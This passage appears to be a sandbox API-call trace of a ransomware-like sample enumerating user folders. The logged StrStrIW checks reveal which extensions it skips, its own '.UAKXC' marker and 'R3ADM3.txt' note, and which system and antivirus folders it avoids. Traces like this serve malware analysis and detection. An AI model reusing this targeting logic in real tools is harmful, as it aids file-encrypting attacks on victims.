Flags=0x0, Size=0x30) returned 0xee3fc8 [0141.457] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec35a8 [0141.457] StrStrIW (lpFirst="NTUSER.DAT.LOG2", lpSrch=".UAKXC") returned 0x0 [0141.457] StrStrIW (lpFirst="NTUSER.DAT.LOG2", lpSrch=".exe") returned 0x0 [0141.457] StrStrIW (lpFirst="NTUSER.DAT.LOG2", lpSrch=".dll") returned 0x0 [0141.457] StrStrIW (lpFirst="NTUSER.DAT.LOG2", lpSrch=".lnk") returned 0x0 [0141.457] StrStrIW (lpFirst="NTUSER.DAT.LOG2", lpSrch=".sys") returned 0x0 [0141.457] StrStrIW (lpFirst="NTUSER.DAT.LOG2", lpSrch=".msi") returned 0x0 [0141.457] StrStrIW (lpFirst="NTUSER.DAT.LOG2", lpSrch="R3ADM3.txt") returned 0x0 [0141.457] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2d58 [0141.457] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4038 [0141.457] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3fc8 [0141.457] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec35a8 [0141.457] StrStrIW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".UAKXC") returned 0x0 [0141.457] StrStrIW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".exe") returned 0x0 [0141.457] StrStrIW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".dll") returned 0x0 [0141.457] StrStrIW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".lnk") returned 0x0 [0141.457] StrStrIW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".sys") returned 0x0 [0141.457] StrStrIW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".msi") returned 0x0 [0141.457] StrStrIW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch="R3ADM3.txt") returned 0x0 [0141.457] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeef2b0 [0141.457] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4038 [0141.457] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3fc8 [0141.457] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef1428 [0141.458] StrStrIW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".UAKXC") returned 0x0 [0141.458] StrStrIW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".exe") returned 0x0 [0141.458] StrStrIW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".dll") returned 0x0 [0141.458] StrStrIW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".lnk") returned 0x0 [0141.458] StrStrIW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".sys") returned 0x0 [0141.458] StrStrIW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".msi") returned 0x0 [0141.458] StrStrIW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch="R3ADM3.txt") returned 0x0 [0141.458] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xc0) returned 0xef09d0 [0141.458] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4038 [0141.458] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3fc8 [0141.458] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xe0) returned 0xedaa80 [0141.458] StrStrIW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".UAKXC") returned 0x0 [0141.458] StrStrIW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".exe") returned 0x0 [0141.458] StrStrIW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".dll") returned 0x0 [0141.458] StrStrIW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".lnk") returned 0x0 [0141.458] StrStrIW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".sys") returned 0x0 [0141.458] StrStrIW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".msi") returned 0x0 [0141.458] StrStrIW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch="R3ADM3.txt") returned 0x0 [0141.459] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xc0) returned 0xef09d0 [0141.459] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4038 [0141.459] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3fc8 [0141.459] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xe0) returned 0xedaa80 [0141.459] StrStrIW (lpFirst="ntuser.ini", lpSrch=".UAKXC") returned 0x0 [0141.459] StrStrIW (lpFirst="ntuser.ini", lpSrch=".exe") returned 0x0 [0141.459] StrStrIW (lpFirst="ntuser.ini", lpSrch=".dll") returned 0x0 [0141.459] StrStrIW (lpFirst="ntuser.ini", lpSrch=".lnk") returned 0x0 [0141.459] StrStrIW (lpFirst="ntuser.ini", lpSrch=".sys") returned 0x0 [0141.459] StrStrIW (lpFirst="ntuser.ini", lpSrch=".msi") returned 0x0 [0141.459] StrStrIW (lpFirst="ntuser.ini", lpSrch="R3ADM3.txt") returned 0x0 [0141.459] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2df8 [0141.459] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4038 [0141.459] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3fc8 [0141.459] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x46) returned 0xec1d30 [0141.459] StrStrIW (lpFirst="Pictures", lpSrch="tmp") returned 0x0 [0141.459] StrStrIW (lpFirst="Pictures", lpSrch="winnt") returned 0x0 [0141.459] StrStrIW (lpFirst="Pictures", lpSrch="temp") returned 0x0 [0141.459] StrStrIW (lpFirst="Pictures", lpSrch="thumb") returned 0x0 [0141.459] StrStrIW (lpFirst="Pictures", lpSrch="$Recycle.Bin") returned 0x0 [0141.459] StrStrIW (lpFirst="Pictures", lpSrch="$RECYCLE.BIN") returned 0x0 [0141.459] StrStrIW (lpFirst="Pictures", lpSrch="System Volume Information") returned 0x0 [0141.459] StrStrIW (lpFirst="Pictures", lpSrch="Boot") returned 0x0 [0141.459] StrStrIW (lpFirst="Pictures", lpSrch="Windows") returned 0x0 [0141.459] StrStrIW (lpFirst="Pictures", lpSrch="Trend Micro") returned 0x0 [0141.459] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2e20 [0141.459] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4038 [0141.459] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3fc8 [0141.460] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x46) returned 0xec1d30 [0141.460] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0141.460] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0141.460] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0141.460] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0141.460] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0141.460] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0141.460] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0141.460] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0141.460] lstrcmpW (lpString1="Recent", lpString2=".") returned 1 [0141.460] lstrcmpW (lpString1="Recent", lpString2="..") returned 1 [0141.460] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd894d74c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0141.460] lstrcmpW (lpString1="Saved Games", lpString2=".") returned 1 [0141.460] lstrcmpW (lpString1="Saved Games", lpString2="..") returned 1 [0141.460] StrStrIW (lpFirst="Saved Games", lpSrch="tmp") returned 0x0 [0141.460] StrStrIW (lpFirst="Saved Games", lpSrch="winnt") returned 0x0 [0141.460] StrStrIW (lpFirst="Saved Games", lpSrch="temp") returned 0x0 [0141.460] StrStrIW (lpFirst="Saved Games", lpSrch="thumb") returned 0x0 [0141.460] StrStrIW (lpFirst="Saved Games", lpSrch="$Recycle.Bin") returned 0x0 [0141.460] StrStrIW (lpFirst="Saved Games", lpSrch="$RECYCLE.BIN") returned 0x0 [0141.460] StrStrIW (lpFirst="Saved Games", lpSrch="System Volume Information") returned 0x0 [0141.460] StrStrIW (lpFirst="Saved Games", lpSrch="Boot") returned 0x0 [0141.460] StrStrIW (lpFirst="Saved Games", lpSrch="Windows") returned 0x0 [0141.460] StrStrIW (lpFirst="Saved Games", lpSrch="Trend Micro") returned 0x0 [0141.460] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2e48 [0141.460] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4038 [0141.460] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3fc8 [0141.461] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x46) returned 0xec1d30 [0141.461] StrStrIW (lpFirst="Searches", lpSrch="tmp") returned 0x0 [0141.461] StrStrIW (lpFirst="Searches", lpSrch="winnt") returned 0x0 [0141.461] StrStrIW (lpFirst="Searches", lpSrch="temp") returned 0x0 [0141.461] StrStrIW (lpFirst="Searches", lpSrch="thumb") returned 0x0 [0141.461] StrStrIW (lpFirst="Searches", lpSrch="$Recycle.Bin") returned 0x0 [0141.461] StrStrIW (lpFirst="Searches", lpSrch="$RECYCLE.BIN") returned 0x0 [0141.461] StrStrIW (lpFirst="Searches", lpSrch="System Volume Information") returned 0x0 [0141.461] StrStrIW (lpFirst="Searches", lpSrch="Boot") returned 0x0 [0141.461] StrStrIW (lpFirst="Searches", lpSrch="Windows") returned 0x0 [0141.461] StrStrIW (lpFirst="Searches", lpSrch="Trend Micro") returned 0x0 [0141.461] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2e70 [0141.461] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4038 [0141.461] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3fc8 [0141.461] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x46) returned 0xec1d30 [0141.461] StrStrIW (lpFirst="Videos", lpSrch="tmp") returned 0x0 [0141.461] StrStrIW (lpFirst="Videos", lpSrch="winnt") returned 0x0 [0141.461] StrStrIW (lpFirst="Videos", lpSrch="temp") returned 0x0 [0141.461] StrStrIW (lpFirst="Videos", lpSrch="thumb") returned 0x0 [0141.461] StrStrIW (lpFirst="Videos", lpSrch="$Recycle.Bin") returned 0x0 [0141.461] StrStrIW (lpFirst="Videos", lpSrch="$RECYCLE.BIN") returned 0x0 [0141.461] StrStrIW (lpFirst="Videos", lpSrch="System Volume Information") returned 0x0 [0141.461] StrStrIW (lpFirst="Videos", lpSrch="Boot") returned 0x0 [0141.461] StrStrIW (lpFirst="Videos", lpSrch="Windows") returned 0x0 [0141.461] StrStrIW (lpFirst="Videos", lpSrch="Trend Micro") returned 0x0 [0141.461] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4038 [0141.462] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3fc8 [0141.577] StrStrIW (lpFirst="Desktop", lpSrch="tmp") returned 0x0 [0141.577] StrStrIW (lpFirst="Desktop", lpSrch="winnt") returned 0x0 [0141.577] StrStrIW (lpFirst="Desktop", lpSrch="temp") returned 0x0 [0141.577] StrStrIW (lpFirst="Desktop", lpSrch="thumb") returned 0x0 [0141.577] StrStrIW (lpFirst="Desktop", lpSrch="$Recycle.Bin") returned 0x0 [0141.577] StrStrIW (lpFirst="Desktop", lpSrch="$RECYCLE.BIN") returned 0x0 [0141.577] StrStrIW (lpFirst="Desktop", lpSrch="System Volume Information") returned 0x0 [0141.577] StrStrIW (lpFirst="Desktop", lpSrch="Boot") returned 0x0 [0141.577] StrStrIW (lpFirst="Desktop", lpSrch="Windows") returned 0x0 [0141.577] StrStrIW (lpFirst="Desktop", lpSrch="Trend Micro") returned 0x0 [0141.577] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeac18 [0141.577] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee40a8 [0141.577] StrStrIW (lpFirst="desktop.ini", lpSrch=".UAKXC") returned 0x0 [0141.578] StrStrIW (lpFirst="desktop.ini", lpSrch=".exe") returned 0x0 [0141.578] StrStrIW (lpFirst="desktop.ini", lpSrch=".dll") returned 0x0 [0141.578] StrStrIW (lpFirst="desktop.ini", lpSrch=".lnk") returned 0x0 [0141.578] StrStrIW (lpFirst="desktop.ini", lpSrch=".sys") returned 0x0 [0141.578] StrStrIW (lpFirst="desktop.ini", lpSrch=".msi") returned 0x0 [0141.578] StrStrIW (lpFirst="desktop.ini", lpSrch="R3ADM3.txt") returned 0x0 [0141.578] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2ec0 [0141.578] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2ee8 [0141.578] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee40a8 [0141.578] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x46) returned 0xec1d30 [0141.578] StrStrIW (lpFirst="Documents", lpSrch="tmp") returned 0x0 [0141.578] StrStrIW (lpFirst="Documents", lpSrch="winnt") returned 0x0 [0141.578] StrStrIW (lpFirst="Documents", lpSrch="temp") returned 0x0 [0141.578] StrStrIW (lpFirst="Documents", lpSrch="thumb") returned 0x0 [0141.578] StrStrIW (lpFirst="Documents", lpSrch="$Recycle.Bin") returned 0x0 [0141.578] StrStrIW (lpFirst="Documents", lpSrch="$RECYCLE.BIN") returned 0x0 [0141.578] StrStrIW (lpFirst="Documents", lpSrch="System Volume Information") returned 0x0 [0141.578] StrStrIW (lpFirst="Documents", lpSrch="Boot") returned 0x0 [0141.578] StrStrIW (lpFirst="Documents", lpSrch="Windows") returned 0x0 [0141.578] StrStrIW (lpFirst="Documents", lpSrch="Trend Micro") returned 0x0 [0141.578] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2ee8 [0141.578] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2f10 [0141.578] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee40a8 [0141.578] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x46) returned 0xec1d30 [0141.578] StrStrIW (lpFirst="Downloads", lpSrch="tmp") returned 0x0 [0141.578] StrStrIW (lpFirst="Downloads", lpSrch="winnt") returned 0x0 [0141.579] StrStrIW (lpFirst="Downloads", lpSrch="temp") returned 0x0 [0141.579] StrStrIW (lpFirst="Downloads", lpSrch="thumb") returned 0x0 [0141.579] StrStrIW (lpFirst="Downloads", lpSrch="$Recycle.Bin") returned 0x0 [0141.579] StrStrIW (lpFirst="Downloads", lpSrch="$RECYCLE.BIN") returned 0x0 [0141.579] StrStrIW (lpFirst="Downloads", lpSrch="System Volume Information") returned 0x0 [0141.579] StrStrIW (lpFirst="Downloads", lpSrch="Boot") returned 0x0 [0141.579] StrStrIW (lpFirst="Downloads", lpSrch="Windows") returned 0x0 [0141.579] StrStrIW (lpFirst="Downloads", lpSrch="Trend Micro") returned 0x0 [0141.579] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2f10 [0141.579] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2f38 [0141.579] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee40a8 [0141.579] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x46) returned 0xec1d30 [0141.579] StrStrIW (lpFirst="Favorites", lpSrch="tmp") returned 0x0 [0141.579] StrStrIW (lpFirst="Favorites", lpSrch="winnt") returned 0x0 [0141.579] StrStrIW (lpFirst="Favorites", lpSrch="temp") returned 0x0 [0141.579] StrStrIW (lpFirst="Favorites", lpSrch="thumb") returned 0x0 [0141.579] StrStrIW (lpFirst="Favorites", lpSrch="$Recycle.Bin") returned 0x0 [0141.579] StrStrIW (lpFirst="Favorites", lpSrch="$RECYCLE.BIN") returned 0x0 [0141.579] StrStrIW (lpFirst="Favorites", lpSrch="System Volume Information") returned 0x0 [0141.579] StrStrIW (lpFirst="Favorites", lpSrch="Boot") returned 0x0 [0141.579] StrStrIW (lpFirst="Favorites", lpSrch="Windows") returned 0x0 [0141.579] StrStrIW (lpFirst="Favorites", lpSrch="Trend Micro") returned 0x0 [0141.579] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2f38 [0141.579] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2f60 [0141.579] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee40a8 [0141.579] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x46) returned 0xec1d30 [0141.579] StrStrIW (lpFirst="Libraries", lpSrch="tmp") returned 0x0 [0141.579] StrStrIW (lpFirst="Libraries", lpSrch="winnt") returned 0x0 [0141.579] StrStrIW (lpFirst="Libraries", lpSrch="temp") returned 0x0 [0141.579] StrStrIW (lpFirst="Libraries", lpSrch="thumb") returned 0x0 [0141.580] StrStrIW (lpFirst="Libraries", lpSrch="$Recycle.Bin") returned 0x0 [0141.580] StrStrIW (lpFirst="Libraries", lpSrch="$RECYCLE.BIN") returned 0x0 [0141.580] StrStrIW (lpFirst="Libraries", lpSrch="System Volume Information") returned 0x0 [0141.580] StrStrIW (lpFirst="Libraries", lpSrch="Boot") returned 0x0 [0141.580] StrStrIW (lpFirst="Libraries", lpSrch="Windows") returned 0x0 [0141.580] StrStrIW (lpFirst="Libraries", lpSrch="Trend Micro") returned 0x0 [0141.580] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2f60 [0141.580] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2f88 [0141.580] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee40a8 [0141.580] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x46) returned 0xec1d30 [0141.580] StrStrIW (lpFirst="Music", lpSrch="tmp") returned 0x0 [0141.580] StrStrIW (lpFirst="Music", lpSrch="winnt") returned 0x0 [0141.580] StrStrIW (lpFirst="Music", lpSrch="temp") returned 0x0 [0141.580] StrStrIW (lpFirst="Music", lpSrch="thumb") returned 0x0 [0141.580] StrStrIW (lpFirst="Music", lpSrch="$Recycle.Bin") returned 0x0 [0141.580] StrStrIW (lpFirst="Music", lpSrch="$RECYCLE.BIN") returned 0x0 [0141.580] StrStrIW (lpFirst="Music", lpSrch="System Volume Information") returned 0x0 [0141.580] StrStrIW (lpFirst="Music", lpSrch="Boot") returned 0x0 [0141.580] StrStrIW (lpFirst="Music", lpSrch="Windows") returned 0x0 [0141.580] StrStrIW (lpFirst="Music", lpSrch="Trend Micro") returned 0x0 [0141.580] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2f88 [0141.580] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee40a8 [0141.580] StrStrIW (lpFirst="Pictures", lpSrch="tmp") returned 0x0 [0141.580] StrStrIW (lpFirst="Pictures", lpSrch="winnt") returned 0x0 [0141.580] StrStrIW (lpFirst="Pictures", lpSrch="temp") returned 0x0 [0141.580] StrStrIW (lpFirst="Pictures", lpSrch="thumb") returned 0x0 [0141.580] StrStrIW (lpFirst="Pictures", lpSrch="$Recycle.Bin") returned 0x0 [0141.580] StrStrIW (lpFirst="Pictures", lpSrch="$RECYCLE.BIN") returned 0x0 [0141.581] StrStrIW (lpFirst="Pictures", lpSrch="System Volume Information") returned 0x0 [0141.581] StrStrIW (lpFirst="Pictures", lpSrch="Boot") returned 0x0 [0141.581] StrStrIW (lpFirst="Pictures", lpSrch="Windows") returned 0x0 [0141.581] StrStrIW (lpFirst="Pictures", lpSrch="Trend Micro") returned 0x0 [0141.581] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2fb0 [0141.581] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2fd8 [0141.581] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee40a8 [0141.581] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x46) returned 0xec1d30 [0141.581] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0141.581] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0141.581] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0141.581] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0141.581] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0141.581] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0141.581] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0141.581] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recorded TV", cAlternateFileName="RECORD~1")) returned 1 [0141.581] lstrcmpW (lpString1="Recorded TV", lpString2=".") returned 1 [0141.581] lstrcmpW (lpString1="Recorded TV", lpString2="..") returned 1 [0141.581] StrStrIW (lpFirst="Recorded TV", lpSrch="tmp") returned 0x0 [0141.581] StrStrIW (lpFirst="Recorded TV", lpSrch="winnt") returned 0x0 [0141.581] StrStrIW (lpFirst="Recorded TV", lpSrch="temp") returned 0x0 [0141.581] StrStrIW (lpFirst="Recorded TV", lpSrch="thumb") returned 0x0 [0141.581] StrStrIW (lpFirst="Recorded TV", lpSrch="$Recycle.Bin") returned 0x0 [0141.581] StrStrIW (lpFirst="Recorded TV", lpSrch="$RECYCLE.BIN") returned 0x0 [0141.581] StrStrIW (lpFirst="Recorded TV", lpSrch="System Volume Information") returned 0x0 [0141.581] StrStrIW (lpFirst="Recorded TV", lpSrch="Boot") returned 0x0 [0141.581] StrStrIW (lpFirst="Recorded TV", lpSrch="Windows") returned 0x0 [0141.581] StrStrIW (lpFirst="Recorded TV", lpSrch="Trend Micro") returned 0x0 [0141.581] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2fd8 [0141.582] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef3000 [0141.582] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee40a8 [0141.582] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x46) returned 0xec1d30 [0141.582] StrStrIW (lpFirst="Videos", lpSrch="tmp") returned 0x0 [0141.582] StrStrIW (lpFirst="Videos", lpSrch="winnt") returned 0x0 [0141.582] StrStrIW (lpFirst="Videos", lpSrch="temp") returned 0x0 [0141.582] StrStrIW (lpFirst="Videos", lpSrch="thumb") returned 0x0 [0141.582] StrStrIW (lpFirst="Videos", lpSrch="$Recycle.Bin") returned 0x0 [0141.582] StrStrIW (lpFirst="Videos", lpSrch="$RECYCLE.BIN") returned 0x0 [0141.582] StrStrIW (lpFirst="Videos", lpSrch="System Volume Information") returned 0x0 [0141.582] StrStrIW (lpFirst="Videos", lpSrch="Boot") returned 0x0 [0141.582] StrStrIW (lpFirst="Videos", lpSrch="Windows") returned 0x0 [0141.582] StrStrIW (lpFirst="Videos", lpSrch="Trend Micro") returned 0x0 [0141.582] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef3000 [0141.582] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee40a8 [0141.721] StrStrIW (lpFirst="ExcelLR.cab", lpSrch=".UAKXC") returned 0x0 [0141.721] StrStrIW (lpFirst="ExcelLR.cab", lpSrch=".exe") returned 0x0 [0141.721] StrStrIW (lpFirst="ExcelLR.cab", lpSrch=".dll") returned 0x0 [0141.721] StrStrIW (lpFirst="ExcelLR.cab", lpSrch=".lnk") returned 0x0 [0141.721] StrStrIW (lpFirst="ExcelLR.cab", lpSrch=".sys") returned 0x0 [0141.721] StrStrIW (lpFirst="ExcelLR.cab", lpSrch=".msi") returned 0x0 [0141.721] StrStrIW (lpFirst="ExcelLR.cab", lpSrch="R3ADM3.txt") returned 0x0 [0141.721] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef25d8 [0141.721] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xeddd40 [0141.721] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd900 [0141.721] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xedaa80 [0141.721] StrStrIW (lpFirst="ExcelMUI.msi", lpSrch=".UAKXC") returned 0x0 [0141.721] StrStrIW (lpFirst="ExcelMUI.msi", lpSrch=".exe") returned 0x0 [0141.721] StrStrIW (lpFirst="ExcelMUI.msi", lpSrch=".dll") returned 0x0 [0141.721] StrStrIW (lpFirst="ExcelMUI.msi", lpSrch=".lnk") returned 0x0 [0141.722] StrStrIW (lpFirst="ExcelMUI.msi", lpSrch=".sys") returned 0x0 [0141.722] StrStrIW 